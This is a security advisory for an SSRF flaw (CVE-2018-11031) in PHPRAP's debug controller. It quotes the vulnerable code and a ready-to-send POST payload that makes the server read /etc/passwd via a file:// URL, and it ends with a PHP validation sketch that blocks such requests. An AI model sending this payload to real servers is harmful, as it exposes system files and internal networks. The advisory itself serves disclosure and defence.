PHPRAP 1.0.4 - 1.0.8 CVE-2018-11031 – Server-side Request Forgery

Authors: FortuneC00kie           Risk: High

CVE: CVE-2018-11031             0day: Server-side Request Forgery

0day-id: 0DAY-176179            Date: 2018-05-14

Description

application/home/controller/debug.php in PHPRAP 1.0.4 through 1.0.8 has SSRF via the /debug URI, as demonstrated by an api[url]=file:////etc/passwd&api[method]=get POST request.

Analysis

file: application/home/controller/debug.php, line 11

class debug extends controller {

    // Get interface id
    public function index()
    {
        $api     = request::post('api', []);
        $request = request::post('request', []);

        if(!$url = $api['url']){

            response::ajax(['code'=> 300, 'msg' => 'Request address does not exist']);

        }

        if(!$method = $api['method']){

            response::ajax(['code'=> 300, 'msg' => 'Request address does not exist']);

        }

        $data = [];

        foreach ($request as $k=>$v){
            foreach ($v as $k1=>$v1){
                $data[$request['key'][$k1]] = $v1;
            }
        }

        // $url and $method come straight from the POST body and reach curl unchecked
        $curl = new curl($url, $method, $data);

This method does not restrict HTTP requests to intranet addresses, so it can be used for an SSRF attack.
For example, take the following request:

url: http://www.xxxxxx.com/debug
post: api[url]=file:////etc/passwd&api[method]=get

You can see that the server returned the contents of /etc/passwd.
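One way to validate api[url] before it reaches curl, shown as an added example that is not PHPRAP's code or its actual patch. The helper names ssrf_check_url() and safe_fetch() are hypothetical, and the sketch assumes the ext-curl functions are called directly and that only IPv4 destinations need to be supported.

```php
<?php
// Added example: ssrf_check_url() and safe_fetch() are hypothetical helpers, not PHPRAP code.
// Returns [host, port, ip] when $url is safe to fetch, otherwise null.
function ssrf_check_url(string $url): ?array
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null; // file://, gopher://, dict:// and the rest never reach curl
    }
    $host = $parts['host'];
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Resolve once (IPv4 only in this sketch); a literal IP is used as-is.
    $ips   = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    $flags = FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null; // private, loopback, link-local or reserved address
        }
    }
    return $ips ? [$host, $port, $ips[0]] : null;
}

function safe_fetch(string $url, string $method = 'GET'): ?string
{
    $target = ssrf_check_url($url);
    if ($target === null) { return null; }
    [$host, $port, $ip] = $target;
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_CUSTOMREQUEST  => strtoupper($method),
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,               // a redirect could point back inside
        CURLOPT_RESOLVE        => ["$host:$port:$ip"], // pin the validated IP (DNS rebinding)
        CURLOPT_TIMEOUT        => 5,
    ]);
    $body = curl_exec($ch);
    return $body === false ? null : $body;
}

// Constructed inputs: the payload from this advisory plus two internal addresses.
foreach (['file:////etc/passwd', 'http://127.0.0.1/', 'http://10.0.0.5/admin'] as $u) {
    printf("%-24s %s\n", $u, ssrf_check_url($u) === null ? 'rejected' : 'allowed');
}
```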
